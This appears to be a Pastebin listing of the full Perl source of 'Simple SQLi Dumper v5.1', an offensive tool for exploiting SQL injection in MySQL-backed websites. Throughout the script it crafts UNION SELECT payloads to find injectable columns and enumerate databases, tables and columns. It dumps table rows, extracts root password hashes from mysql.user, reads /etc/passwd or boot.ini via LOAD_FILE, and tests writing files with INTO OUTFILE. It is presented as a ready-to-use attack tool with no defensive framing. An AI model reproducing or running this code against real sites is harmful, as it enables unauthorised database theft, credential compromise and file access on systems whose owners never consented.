Googleinurl

Simple SQLi Dumper v5.1 for MySQL

Jun 21st, 2014
2,595
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2.  
  3. #*******************************************#
  4. #  Simple SQLi Dumper v5.1 for MySQL        #
  5. #  Coded by Vrs-hCk a.k.a c0li.m0de.0n      #
  6. #  E-Mail: ander[at]antisecurity.org        #
  7. #  YM: vrs_hck[at]yahoo.com                 #
  8. #  Blog: http://c0li.blogspot.com           #
  9. #  www.antisecurity.org - www.MainHack.net  #
  10. #*******************************************#
  11.  
  12. use HTTP::Request;
  13. use LWP::UserAgent;
  14. use Getopt::Long;
  15.  
  16. my $datetime = localtime;
  17. my $OS = "$^O";
  18. if ($OS ne 'MSWin32') { system("clear"); }
  19.  
  20. # unhex(hex()) function. 0=disable, 1=enable
  21. $convert = 0;
  22.  
  23. $logo = "c0li";
  24. $end = '--';
  25. $spc = '+';
  26. $field = 123;
  27. $log = 'ssdp.log';
  28.  
  29. print "\n [o]=================================================[x]\n";
  30. print "  |             Simple SQLi Dumper v5.1               |\n";
  31. print "  |                Coded by Vrs-hCk                   |\n";
  32. print " [o]=================================================[o]\n";
  33. print "    Date : $datetime\n";
  34. print "    Help Command: -h, -help, --help\n\n";
  35.  
  36. w_log("\n [o]=================================================[x]\n".
  37.       "  |             Simple SQLi Dumper v5.1               |\n".
  38.       "  |                Coded by Vrs-hCk                   |\n".
  39.       " [o]=================================================[o]\n".
  40.       "    Log Created : $datetime\n".
  41.       "    Help Command: -h, -help, --help\n\n");
  42.  
  43. sub usage {
  44. print "\n";
  45. print "  |-----------------------------------------------------------------------------|\n";
  46. print "  | Usage: perl ssdp.pl [options]                                               |\n";
  47. print "  |                                                                             |\n";
  48. print "  | -u [SQLi URL]       target with id parameter or sqli url with c0li string   |\n";
  49. print "  | -e [sqli end tag]   sql injection end tag (default: \"--\")                   |\n";
  50. print "  | -d [database name]  this option should not be used (default: \@\@database)    |\n";
  51. print "  | -t [table name]     table_name                                              |\n";
  52. print "  | -c [columns name]   column_name (example: id,user,pass,email)               |\n";
  53. print "  | -s [space code]     SPACE code: +,/**/,%20 (default: \"+\")                   |\n";
  54. print "  | -f [max field]      max field to get magic number (default: 123)            |\n";
  55. print "  | -start [num]        row number to begin dumping data                        |\n";
  56. print "  | -stop [num]         row number to stop dumping                              |\n";
  57. print "  | -where [query]      your special dumping query                              |\n";
  58. print "  |                                                                             |\n";
  59. print "  | -log [file name]    file name to save ssdp data (default: ssdp.log)         |\n";
  60. print "  | -p [http proxy]     hostname:port                                           |\n";
  61. print "  |                                                                             |\n";
  62. print "  | -magic              Find Magic Number                           [MySQL v4+] |\n";
  63. print "  | -info               Get MySQL Information                       [MySQL v4+] |\n";
  64. print "  | -dbase              Concat Databases                            [MySQL v5+] |\n";
  65. print "  | -table              Concat Tables                               [MySQL v5+] |\n";
  66. print "  | -column             Concat Columns                              [MySQL v5+] |\n";
  67. print "  | -tabcol             Concat Tables with Columns                  [MySQL v5+] |\n";
  68. print "  | -find               Search Columns Name                         [MySQL v5+] |\n";
  69. print "  | -dump               Dump Data                                   [MySQL v4+] |\n";
  70. print "  | -brute              Fuzzing Tables & Columns                    [MySQL v4+] |\n";
  71. print "  |-----------------------------------------------------------------------------|\n";
  72. print "   Please read ssdp-examples.txt for more info :)\n";
  73. print "\n\n";
  74. }
  75.  
  76. $sqli = '';
  77. $database = '';
  78. $table = '';
  79. $column = '';
  80. $proxy = '';
  81. $start = 0;
  82. $stop = 0;
  83. $where = '';
  84. $proxy = '';
  85.  
  86. GetOptions (
  87.     "u=s" => \$sqli, "e=s" => \$end, "d=s" => \$database, "t=s" => \$table, "c=s" => \$column, "s=s" => \$spc,
  88.     "f=i" => \$field, "start=i" => \$start, "stop=i" => \$stop, "where=s" => \$where, "log=s" => \$log, "p=s" => \$proxy,
  89.     "info" => sub {
  90.                     url_check();
  91.                     print " [+] c0li SQLi URL: http://$sqli\n";
  92.                     print " [+] SQLi End Tag: $end\n";
  93.                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
  94.                     w_log(" [+] SQLi End Tag: $end\n");
  95.                     proxy_test();
  96.                     get_mysqlinfo($sqli);
  97.                     print "\n Done.\n\n";
  98.                     w_log("\n Done.\n\n");
  99.                   },
  100.     "dbase" => sub {
  101.                      url_check();
  102.                      print " [+] c0li SQLi URL: http://$sqli\n";
  103.                      print " [+] SQLi End Tag: $end\n";
  104.                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
  105.                      w_log(" [+] SQLi End Tag: $end\n");
  106.                      proxy_test();
  107.                      get_databases();
  108.                    },
  109.     "table" => sub {
  110.                      url_check();
  111.                      print " [+] c0li SQLi URL: http://$sqli\n";
  112.                      print " [+] SQLi End Tag: $end\n";
  113.                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
  114.                      w_log(" [+] SQLi End Tag: $end\n");
  115.                      proxy_test();
  116.                      get_tables($database);
  117.                    },
  118.     "column" => sub {
  119.                       url_check();
  120.                       if (!$table) { print " [Error] \"-t [table name]\" option is required.\n\n"; exit(); }
  121.                       print " [+] c0li SQLi URL: http://$sqli\n";
  122.                       print " [+] SQLi End Tag: $end\n";
  123.                       w_log(" [+] c0li SQLi URL: http://$sqli\n");
  124.                       w_log(" [+] SQLi End Tag: $end\n");
  125.                       proxy_test();
  126.                       get_columns($database,$table);
  127.                     },
  128.     "tabcol" => sub {
  129.                       url_check();
  130.                       print " [+] c0li SQLi URL: http://$sqli\n";
  131.                       print " [+] SQLi End Tag: $end\n";
  132.                       w_log(" [+] c0li SQLi URL: http://$sqli\n");
  133.                       w_log(" [+] SQLi End Tag: $end\n");
  134.                       proxy_test();
  135.                       get_tables_columns($database);
  136.                     },
  137.     "find" => sub {
  138.                     url_check();
  139.                     if (!$column) { print " [Error] \"-c [column name]\" option is required.\n\n"; exit(); }
  140.                     print " [+] c0li SQLi URL: http://$sqli\n";
  141.                     print " [+] SQLi End Tag: $end\n";
  142.                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
  143.                     w_log(" [+] SQLi End Tag: $end\n");
  144.                     proxy_test();
  145.                     search_columns($database,$column);
  146.                   },
  147.     "magic" => sub {
  148.                      if (!$sqli) { print " [Error] \"-u [URL]\" option is required.\n\n"; exit(); }
  149.                      if ($sqli =~ /http:\/\// ) { $sqli = str_replace($sqli,"http://",""); }
  150.                      print " [+] URL: http://$sqli\n";
  151.                      print " [+] End Tag: $end\n";
  152.                      w_log(" [+] URL: http://$sqli\n");
  153.                      w_log(" [+] End Tag: $end\n");
  154.                      proxy_test();
  155.                      get_magic_number($sqli);
  156.                    },
  157.     "dump" => sub {
  158.                     url_check();
  159.                     if (!$table) { print " [Error] \"-t [table name]\" option is required.\n\n"; exit(); }
  160.                     if (!$column) { print " [Error] \"-c [columns name]\" option is required.\n\n"; exit(); }
  161.                     print " [+] c0li SQLi URL: http://$sqli\n";
  162.                     print " [+] SQLi End Tag: $end\n";
  163.                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
  164.                     w_log(" [+] SQLi End Tag: $end\n");
  165.                     proxy_test();
  166.                     dump_data();
  167.                   },
  168.     "brute" => sub {
  169.                      url_check();
  170.                      print " [+] c0li SQLi URL: http://$sqli\n";
  171.                      print " [+] SQLi End Tag: $end\n";
  172.                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
  173.                      w_log(" [+] SQLi End Tag: $end\n");
  174.                      proxy_test();
  175.                      brute_tabcol();
  176.                    },
  177.     "help|h" => sub { usage(); }
  178. );
  179.  
  180. sub url_check {
  181.     if (!$sqli) { print " [Error] \"-u [URL]\" option is required.\n\n"; exit(); }
  182.     if ($sqli !~ m/c0li/) { print " [Error] SQLi URL must be included \"c0li\" string.\n\n"; exit(); }
  183.     if ($sqli =~ /http:\/\// ) { $sqli = str_replace($sqli,"http://",""); }
  184.     if ($sqli =~ m/ /) { $sqli = str_replace($sqli," ",$spc); }
  185.     $sqli = str_replace($sqli,"%20",$spc);
  186.     $sqli = str_replace($sqli,"\\+",$spc);
  187.     $sqli = str_replace($sqli,"/\\*\\*/",$spc);
  188.     if ($proxy =~ /http:\/\// ) { $proxy = str_replace($proxy,'http://',''); }
  189. }
  190.  
  191. sub proxy_test {
  192.     if ($proxy) {
  193.         syswrite(STDOUT,"\n Checking HTTP Proxy ...",26);
  194.         w_log("\n Checking HTTP Proxy ...");
  195.         my $ua = LWP::UserAgent->new(agent => "Mozilla/5.0");
  196.         $ua->proxy("http", "http://".$proxy."/");
  197.         $ua->timeout(10);
  198.         my $request = HTTP::Request->new(GET => 'http://www.google.com/');
  199.         my $response = $ua->request($request);
  200.         my $content = $response->content();
  201.         if ($content =~ m/<title>Google<\/title>/g) { print " Good :)\n"; w_log(" Good :)\n"); }
  202.         else { print " Failed :(\n\n"; w_log(" Failed :(\n\n"); $proxy = ''; exit(); }
  203.     }
  204. }
  205.  
  206. sub brute_tabcol {
  207.     open(TABLES, 'tables.dict') or die(" Cannot open or read tables.dict !!\n");
  208.     @tables=<TABLES>;
  209.     close(TABLES);
  210.     open(COLUMNS, 'columns.dict') or die(" Cannot open or read columns.dict !!\n");
  211.     @columns=<COLUMNS>;
  212.     close(COLUMNS);
  213.     print "\n Finding Tables & Columns ...\n\n";
  214.     w_log("\n Finding Tables & Columns ...\n\n");
  215.     my $inc = 0;
  216.     while ($tbl = <@tables>) {
  217.         my $concat = '0x21346E64337273306E21';
  218.         my $from = $spc.'FROM'.$spc.$tbl;
  219.         my $tbldata = ssdp_get_data($concat,$from);
  220.         if ($tbldata eq '!4nd3rs0n!') {
  221.             $inc++;
  222.             syswrite(STDOUT," [$inc] $tbl: ",255);
  223.             w_log(" [$inc] $tbl: ");
  224.             while ($col = <@columns>) {
  225.                 my $coldata = ssdp_get_data($concat.','.$col,$from);
  226.                 if ($coldata =~ /!4nd3rs0n!/) {
  227.                     syswrite(STDOUT,$col.',',255);
  228.                     w_log($col.',');
  229.                 }
  230.             } print "\n"; w_log("\n");
  231.         }
  232.     } print "\n Done.\n\n"; w_log("\n Done.\n\n");
  233. }
  234.  
  235. sub get_magic_number {
  236.     my $c0li = '';
  237.     my $c0de = '';
  238.     my $url = $_[0];
  239.     my $union = $spc."AND".$spc."1=2".$spc."UNION".$spc.'ALL'.$spc."SELECT".$spc;
  240.     print "\n Attempting to find the magic number...\n\n";
  241.     w_log("\n Attempting to find the magic number...\n\n");
  242.     syswrite(STDOUT," [+] Testing: ",14);
  243.     w_log(" [+] Testing: ");
  244.     for ($i=1; $i<=$field; $i++){
  245.         my $bin = '4nd3rs0n'.$i.'4nd3rs3n';
  246.         my $hex = $bin;
  247.         $hex =~ s/(.)/sprintf("%x",ord($1))/eg;
  248.         if (($i > 1) and ($i < $field)) {
  249.             $c0li = $c0li.",0x".$hex;
  250.             $c0de = $c0de.",".$bin;
  251.         } else {
  252.             $c0li = $c0li."0x".$hex;
  253.             $c0de = $c0de.$bin;
  254.         }
  255.         syswrite(STDOUT,$i.",", 255);
  256.         w_log($i.",");
  257.         my $magic = '';
  258.         my $xpl = $url.$union.$c0li.$end;
  259.         my $content = get_content(0,$xpl);
  260.         if (($content =~ m/4nd3rs0n/i) and ($content =~ m/4nd3rs3n/i)) {
  261.             my $number = ssdp_mid_str('4nd3rs0n','4nd3rs3n',$content);
  262.             my $link1 = str_replace($c0de,'4nd3rs0n'.$number.'4nd3rs3n','c0li');
  263.             my $link2 = str_replace($link1,'4nd3rs0n','');
  264.             my $link3 = str_replace($link2,'4nd3rs3n','');
  265.             my $inject = $url.$union.$link3;
  266.             print "\n\n [+] Field Length : $i\n";
  267.             w_log("\n\n [+] Field Length : $i\n");
  268.             print " [+] Magic Number : ";
  269.             w_log(" [+] Magic Number : ");
  270.             for ($x=1; $x<=$i; $x++) { if ($content =~ /4nd3rs0n[$x]4nd3rs3n/i) { print $x.','; w_log($x.','); }}
  271.             print "\n [+] URL Injection: http://$inject\n";
  272.             w_log("\n [+] URL Injection: http://$inject\n");
  273.             $sqli = $inject;
  274.             get_mysqlinfo($inject);
  275.             last();
  276.         }
  277.         if ($i == $field) {
  278.             print "\n\n Failed to get magic number. Please try it manually :)\n\n";
  279.             w_log("\n\n Failed to get magic number. Please try it manually :)\n\n");
  280.             exit();
  281.         }
  282.     }
  283.     print "\n Done.\n\n";
  284.     w_log("\n Done.\n\n");
  285. }
  286.  
  287. sub get_mysqlinfo {
  288.     my $url = $_[0];
  289.     $load_file = '2F6574632F706173737764';
  290.     $load_res = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
  291.     $test_file = '/tmp/c0li-'.(int rand(666)).'.txt';
  292.     $read_file = $test_file;
  293.     $read_file =~ s/(.)/sprintf("%x",ord($1))/eg;
  294.     my $ver_concat = 'CONCAT_WS(0x3a,0x2163306C69,database(),user(),version(),@@version_compile_os,0x63306C6921)';
  295.     if ($convert) { $ver_concat = 'UNHEX(HEX(CONCAT_WS(0x3a,0x2163306C69,database(),user(),@@version,@@version_compile_os,0x63306C6921)))'; }
  296.     my $ver_select = str_replace($url,'c0li',$ver_concat);
  297.     print "\n Showing MySQL Information ...\n\n";
  298.     w_log("\n Showing MySQL Information ...\n\n");
  299.     my $ver_content = get_content(0,$ver_select.$end);
  300.     if ($ver_content =~ /!c0li:(.+?):(.+?):(.+?):(.+?):c0li!/i) {
  301.         my ($db_name,$usr,$ver,$os) = ($1,$2,$3,$4);
  302.         print " [+] Database: $db_name\n";
  303.         print " [+] User: $usr\n";
  304.         print " [+] Version: $ver\n";
  305.         print " [+] System: $os\n";
  306.         w_log(" [+] Database: $db_name\n");
  307.         w_log(" [+] User: $usr\n");
  308.         w_log(" [+] Version: $ver\n");
  309.         w_log(" [+] System: $os\n");
  310.         if (($os =~ /nt/i) or ($os =~ /win/i)) {
  311.             $load_file = '633A2F626F6F742E696E69';
  312.             $load_res = 'Boot Loader';
  313.             $test_file = '/c0li-'.(int rand(666)).'.txt';
  314.             $read_file = $test_file;
  315.             $read_file =~ s/(.)/sprintf("%x",ord($1))/eg;
  316.         }
  317.         my $acc_concat = 'CONCAT_WS(0x3a,0x2163306C69,Host,User,Password,0x63306C6921)';
  318.         if ($convert) { $acc_concat = 'UNHEX(HEX(CONCAT_WS(0x3a,0x2163306C69,Host,User,Password,0x63306C6921)))'; }
  319.         my $acc_select = str_replace($url,'c0li',$acc_concat);
  320.         my $acc_content = get_content(0,$acc_select.$spc.'FROM'.$spc.'mysql.user'.$spc.'where'.$spc.'user=0x726F6F74'.$end);
  321.         if ($acc_content =~ /!c0li:(.+?):(.+?):(.+?):c0li!/i) {
  322.             print " [+] Access to \"mysql\" Database: Yes (w00t)\n";
  323.             print "     [-] Host: $1\n";
  324.             print "     [-] User: $2\n";
  325.             print "     [-] Pass: $3\n";
  326.             w_log(" [+] Access to \"mysql\" Database: Yes (w00t)\n");
  327.             w_log("     [-] Host: $1\n");
  328.             w_log("     [-] User: $2\n");
  329.             w_log("     [-] Pass: $3\n");
  330.         } else { print " [+] Access to \"mysql\" Database: No\n"; w_log(" [+] Access to \"mysql\" Database: No\n"); }
  331.         my $file_concat = 'LOAD_FILE(0x'.$load_file.')';
  332.         my $file_select = str_replace($url,'c0li',$file_concat);
  333.         my $file_content = get_content(0,$file_select.$end);
  334.         if ($file_content =~ /$load_res/i) {
  335.             $load_file =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
  336.             print " [+] Read File \"$load_file\": Yes (w00t)\n";
  337.             w_log(" [+] Read File \"$load_file\": Yes (w00t)\n");
  338.             my $create_concat = '0x63306C692E6D3064652E306E';
  339.             my $create_select = str_replace($url,'c0li',$create_concat);
  340.             my $create_query = $spc.'INTO'.$spc.'OUTFILE'.$spc.'"'.$test_file.'"';
  341.             $undefine = get_content(0,$create_select.$create_query.$end); $undefine = '';
  342.             my $read_concat = 'LOAD_FILE(0x'.$read_file.')';
  343.             my $read_select = str_replace($url,'c0li',$read_concat);
  344.             my $file_content = get_content(0,$read_select.$end);
  345.             if ($file_content =~ /c0li.m0de.0n/i) { print " [+] Create File \"$test_file\": Yes (w00t)\n";
  346.             w_log(" [+] Create File \"$test_file\" : Yes (w00t)\n"); }
  347.             else { print " [+] Create File \"$test_file\": No\n"; w_log(" [+] Create File \"$test_file\": No\n"); }
  348.         }
  349.         else { $load_file =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
  350.             print " [+] Read File \"$load_file\": No\n";
  351.             w_log(" [+] Read File \"$load_file\": No\n");
  352.         }
  353.     }
  354.     else {
  355.         print " Failed to get MySQL Information.\n";
  356.         w_log(" Failed to get MySQL Information.\n");
  357.     }
  358. }
  359.  
  360. sub get_databases {
  361.     my $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.SCHEMATA'.$spc.'WHERE'.$spc.
  362.     'SCHEMA_NAME'.$spc.'NOT'.$spc.'IN'.$spc.'(0x696E666F726D6174696F6E5F736368656D61)';
  363.     my $count = ssdp_get_data('COUNT(*)',$schema);
  364.     print "\n Showing databases ...\n\n";
  365.     w_log("\n Showing databases ...\n\n");
  366.     syswrite(STDOUT, " [+] DATABASES($count): ", 255);
  367.     w_log(" [+] DATABASES($count): ");
  368.     for ($i=0; $i<$count; $i++) {
  369.         my $inc = ($i+1);
  370.         my $query = $schema.$spc.'LIMIT'.$spc.$i.',1';
  371.         my $db_name = ssdp_get_data('SCHEMA_NAME',$query);
  372.         if (($inc>0) and ($inc<$count)) { $db_name = $db_name.','; }
  373.         syswrite(STDOUT,$db_name,255);
  374.         w_log($db_name);
  375.     }
  376.     print "\n\n Done.\n\n";
  377.     w_log("\n\n Done.\n\n");
  378. }
  379.  
  380. sub get_tables {
  381.     my $dbhex = $_[0];
  382.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  383.     my $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.$dbhex;
  384.     if (!$database) { $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=database()';
  385.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n")}
  386.     else { print " [+] Database Name: $database\n"; w_log(" [+] Database Name: $database\n");}
  387.     my $tbl_count = ssdp_get_data('COUNT(*)',$tbl_schema);
  388.     print " [+] Number of Tables: $tbl_count\n\n";
  389.     print " Showing tables ...\n\n";
  390.     w_log(" [+] Number of Tables: $tbl_count\n\n");
  391.     w_log(" Showing tables ...\n\n");
  392.     for ($i=0; $i<$tbl_count; $i++) {
  393.         my $inc = ($i+1);
  394.         my $query = $tbl_schema.$spc.'LIMIT'.$spc.$i.',1';
  395.         my $tbl_name = ssdp_get_data('TABLE_NAME',$query);
  396.         my $data_schema = $spc.'FROM'.$spc.$database.'.'.$tbl_name;
  397.         if (!$database) { $data_schema = $spc.'FROM'.$spc.$tbl_name; }
  398.         my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  399.         syswrite(STDOUT," [".$inc."] ".$tbl_name."($data_count)\n", 255);
  400.         w_log(" [".$inc."] ".$tbl_name."($data_count)\n");
  401.     }
  402.     print "\n Done.\n\n";
  403.     w_log("\n Done.\n\n");
  404. }
  405.  
  406. sub get_columns {
  407.     my $dbhex = $_[0];
  408.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  409.     my $tblhex = $_[1];
  410.     $tblhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  411.     my $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
  412.     $dbhex.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
  413.     if (!$database) { $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
  414.     'database()'.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
  415.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
  416.     else { print " [+] Database Name: $database\n";    w_log(" [+] Database Name: $database\n"); }
  417.     my $col_count = ssdp_get_data("COUNT(*)",$col_schema);
  418.     my $data_schema = $spc.'FROM'.$spc.$database.'.'.$table;
  419.     if (!$database) { $data_schema = $spc.'FROM'.$spc.$table; }
  420.     my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  421.     print " [+] Table Name: $table\n";
  422.     print " [+] Number of Columns: $col_count\n\n";
  423.     print " Showing columns from table \"$table\" ...\n\n";
  424.     w_log(" [+] Table Name: $table\n");
  425.     w_log(" [+] Number of Columns: $col_count\n\n");
  426.     w_log(" Showing columns from table \"$table\" ...\n\n");
  427.     syswrite(STDOUT, " [+] ".$table."\($data_count\): ", 255);
  428.     for ($i=0; $i<$col_count; $i++) {
  429.         my $inc = ($i+1);
  430.         my $query = $col_schema.$spc.'LIMIT'.$spc.$i.',1';
  431.         my $col_name = ssdp_get_data('COLUMN_NAME',$query);
  432.         if (($inc>0) and ($inc<$col_count)) { $col_name = $col_name.','; }
  433.         syswrite(STDOUT,$col_name,255);
  434.         w_log($col_name);
  435.     }
  436.     print "\n\n Done.\n\n";
  437.     w_log("\n\n Done.\n\n");
  438. }
  439.  
  440. sub get_tables_columns {
  441.     my $dbhex = $_[0];
  442.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  443.     my $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.$dbhex;
  444.     if (!$database) { $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=database()';
  445.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
  446.     else { print " [+] Database Name: $database\n";    w_log(" [+] Database Name: $database\n"); }
  447.     my $tbl_count = ssdp_get_data('COUNT(*)',$tbl_schema);
  448.     print " [+] Number of Tables: $tbl_count\n";
  449.     print "\n Showing Tables & Columns ...\n\n";
  450.     w_log(" [+] Number of Tables: $tbl_count\n");
  451.     w_log("\n Showing Tables & Columns ...\n\n");
  452.     for ($i=0; $i<$tbl_count; $i++) {
  453.         my $tbl_inc = ($i+1);
  454.         my $tbl_query = $tbl_schema.$spc.'LIMIT'.$spc.$i.',1';
  455.         my $tbl_name = ssdp_get_data('TABLE_NAME',$tbl_query);
  456.         my $data_schema = $spc.'FROM'.$spc.$database.'.'.$tbl_name;
  457.         if (!$database) { $data_schema = $spc.'FROM'.$spc.$tbl_name; }
  458.         my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  459.         syswrite(STDOUT," [$tbl_inc] ".$tbl_name."($data_count): ", 255);
  460.         w_log(" [$tbl_inc] ".$tbl_name."($data_count): ");
  461.         my $tblhex = $tbl_name;
  462.         $tblhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  463.         my $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
  464.         $dbhex.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
  465.         if (!$database) { $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
  466.         'database()'.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex; }
  467.         my $col_count = ssdp_get_data('COUNT(*)',$col_schema);
  468.         for ($x=0; $x<$col_count; $x++) {
  469.             my $col_inc = ($x+1);
  470.             my $col_query = $col_schema.$spc.'LIMIT'.$spc.$x.',1';
  471.             my $col_name = ssdp_get_data('COLUMN_NAME',$col_query);
  472.             if (($col_inc>0) and ($col_inc<$col_count)) { $col_name = $col_name.','; }
  473.             syswrite(STDOUT,$col_name,255);
  474.             w_log($col_name);
  475.         }
  476.         print "\n"; w_log("\n");
  477.     }
  478.     print "\n Done.\n\n"; w_log("\n Done.\n\n");
  479. }
  480.  
  481. sub dump_data {
  482.     my $concat = 'CONCAT_WS(0x203A20,'.$column.')';
  483.     my $data_schema = $spc.'FROM'.$spc.$database.'.'.$table;
  484.     if (!$database) { $data_schema = $spc.'FROM'.$spc.$table; print "\n [+] Database Name: database()\n"; }
  485.     else { print "\n [+] Database Name: $database\n"; }
  486.     my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  487.     if (!$data_count) { print " Failed to get data count.\n\n Halted.\n\n";
  488.     w_log(" Failed to get data count.\n\n Halted.\n\n"); exit(); };
  489.     if ($data_count == 0) { print " No data. Operation halted.\n\n";
  490.     w_log(" No data. Operation halted.\n\n"); exit(); };
  491.     print " [+] Table Name: $table\n";
  492.     print " [+] Column Name: $column\n";
  493.     print " [+] Data Count: $data_count\n";
  494.     w_log(" [+] Table Name: $table\n");
  495.     w_log(" [+] Column Name: $column\n");
  496.     w_log(" [+] Data Count: $data_count\n");
  497.     if ($where ne '') {
  498.         print "\n Special Dump Query: WHERE $where\n";
  499.         w_log("\n Special Dump Query: WHERE $where\n");
  500.         $where = str_replace($where,' ',$spc);
  501.         my $where_count = ssdp_get_data('COUNT(*)',$data_schema.$spc.'WHERE'.$spc.$where);
  502.         print "\n Dumping $where_count Data ...\n\n";
  503.         w_log("\n Dumping $where_count Data ...\n\n");
  504.         for ($x=0; $x<=$where_count-1; $x++) {
  505.             my $inc = ($x+1);
  506.             my $where_query = $data_schema.$spc.'WHERE'.$spc.$where.$spc.'LIMIT'.$spc.$x.',1';
  507.             my $dumping = ssdp_get_data($concat,$where_query);
  508.             if ($dumping eq '') { print " [$inc] No data. Operation halted.\n\n";
  509.             w_log(" [$inc] No data. Operation halted.\n\n"); exit(); }
  510.             open(LOG,">>$log") || die(" [$logo] Cannot open file.\n");
  511.             print LOG "$dumping\n";
  512.             close(LOG);
  513.             print " [$inc] $dumping\n";
  514.         }
  515.         print "\n Done.\n\n";
  516.         w_log("\n Done.\n\n");
  517.     }
  518.     else {
  519.         print "\n Dumping Data ...\n\n";
  520.         w_log("\n Dumping Data ...\n\n");
  521.         if ($start == 0 and $stop == 0) { $start = 0; $stop = $data_count -1; }
  522.         for ($i=$start; $i<=$stop; $i++) {
  523.             my $inc = ($i+1);
  524.             my $query = $data_schema.$spc.'LIMIT'.$spc.$i.',1';
  525.             my $dumping = ssdp_get_data($concat,$query);
  526.             if ($dumping eq '') { $dumping = '<no data>'; }
  527.             open(LOG,">>$log") || die(" [$logo] Cannot open file.\n");
  528.             print LOG "$dumping\n";
  529.             close(LOG);
  530.             print " [$inc] $dumping\n";
  531.         }
  532.         print "\n Done.\n\n";
  533.         w_log("\n Done.\n\n");
  534.     }
  535. }
  536.  
  537. sub search_columns {
  538.     my $dbhex = $_[0];
  539.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  540.     my $colhex = $_[1];
  541.     $colhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  542.     my $concat = 'TABLE_SCHEMA,0x2e,TABLE_NAME,0x2e,COLUMN_NAME';
  543.     my $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
  544.     $dbhex.$spc.'AND'.$spc.'COLUMN_NAME'.$spc.'LIKE'.$spc.'(0x25'.$colhex.'25)';
  545.     if (!$database) { $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
  546.     'database()'.$spc.'AND'.$spc.'COLUMN_NAME'.$spc.'LIKE'.$spc.'(0x25'.$colhex.'25)';
  547.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
  548.     else { print " [+] Database Name: $database\n"; w_log(" [+] Database Name: $database\n"); }
  549.     print "\n Searching for Columns Name like *$column* ...\n\n";
  550.     print " [+] Columns Found: \n\n";
  551.     w_log("\n Searching for Columns Name like *$column* ...\n\n");
  552.     w_log(" [+] Columns Found: \n\n");
  553.     my $status = 1;
  554.     my $i = 0;
  555.     while ($status == 1) {
  556.         my $inc = ($i+1);
  557.         my $col_query = $schema.$spc.'LIMIT'.$spc.$i.',1';
  558.         my $result = ssdp_get_data($concat,$col_query);
  559.         if (($result eq '') and ($i == 0)) { print " [$inc] No data. Operation halted.\n\n Done.\n\n";
  560.         w_log(" [$inc] No data. Operation halted.\n\n Done.\n\n"); exit(); }
  561.         elsif ($result eq '') { print "\n Done.\n\n"; w_log("\n Done.\n\n"); exit(); }
  562.         print " [$inc] $result\n";
  563.         w_log(" [$inc] $result\n");
  564.         $i++;
  565.     }
  566. }
  567.  
  568. sub ssdp_get_data {
  569.     my $select = $_[0];
  570.     my $filter = $_[1];
  571.     my $data = '';
  572.     my $concat = 'CONCAT(0x63306C6923,'.$select.',0x2363306C69)';
  573.     if ($convert) { $concat = 'UNHEX(HEX(CONCAT(0x63306C6923,'.$select.',0x2363306C69)))'; }
  574.     my $query = str_replace($sqli,'c0li',$concat);
  575.     my $content = get_content(0,$query.$filter.$end);
  576.     if ($content =~ /c0li/i) { $data = ssdp_mid_str('c0li#','#c0li',$content); }
  577.     if ($data eq '') { return ''; }
  578.     return $data;
  579. }
  580.  
  581. sub ssdp_mid_str {
  582.     my $left = $_[0];
  583.     my $right = $_[1];
  584.     my $string = $_[2];
  585.     my @exp = split($left,$string);
  586.     my @data = split($right,$exp[1]);
  587.     return $data[0];
  588. }
  589.  
  590. sub str_replace {
  591.     my $source  = shift;
  592.     my $search  = shift;
  593.     my $replace = shift;
  594.     $source =~ s/$search/$replace/ge;
  595.     return $source;
  596. }
  597.  
